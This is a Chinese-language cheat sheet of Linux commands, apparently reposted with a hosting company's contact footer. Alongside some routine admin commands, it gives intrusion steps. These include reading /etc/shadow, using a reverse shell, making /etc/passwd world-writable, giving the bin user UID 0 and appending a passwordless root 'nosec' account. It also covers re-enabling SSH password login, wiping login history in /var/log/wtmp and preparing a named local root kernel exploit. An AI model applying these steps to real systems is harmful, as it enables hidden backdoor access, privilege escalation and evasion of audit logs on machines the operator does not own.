cat /etc/passwd 查看linux用戶
cat /etc/shadow 查看用戶密碼需要root權(quán)限
cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表網(wǎng)卡號 查看所在網(wǎng)卡的ip信息
ifconfig 查看本機ip信息
cat /etc/resolv.conf 查看DNS信息
bash -i 在反彈的shell中使用可以直觀顯示命令
bash prompt: 當你以普通限權(quán)用戶身份進入的時候,一般你會有一個類似bash$的prompt。當你以Root登陸時,你的prompt會變成
bash#。
系統(tǒng)變量 : 試著echo "$USER / $EUID" 系統(tǒng)應(yīng)該會告訴你它認為你是什么用戶。
echo 1>/proc/sys/net/ipv4/if_forward是不是你寫錯了,應(yīng)該是echo 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward 吧,默認是0,也就是內(nèi)核不進行數(shù)據(jù)包過濾,改為1 ,讓內(nèi)核對數(shù)據(jù)包進行filter處理!
netstat -an |grep LISTEN |grep :80 查看端口
service --status-all | grep running
service --status-all | grep http
查看運行服務(wù)
lsb_release -a 查看系統(tǒng)版本
重啟ssh服務(wù) :/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_config文件里
PasswordAuthentication no,
將其改為
PasswordAuthentication yes
遠程ssh才可登錄
否則顯示Access denied
其中Usepam yes可能用來建立pam方式login,比如從其它linux主機ssh到服務(wù)端,如果關(guān)閉,則不能打開.
su的菜鳥用法
先chomod 777 /etc/passwd
然后修改bin用戶的gid和uid為0
然后passwd設(shè)置bin的密碼
然后cp /bin/bash /sbin/nologin
然后su的時候su - bin就可以到rootshell了。
這個原理就是當ssh不允許root用ssh終端登陸的時候,我們又不知道root密碼,的一種很菜鳥的做法
還可以這樣
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c –o local –static –Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
清空last記錄 cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 建立一個100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提權(quán)的時候要用到的
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【mszdt.com】
服務(wù)器租用/服務(wù)器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM]
|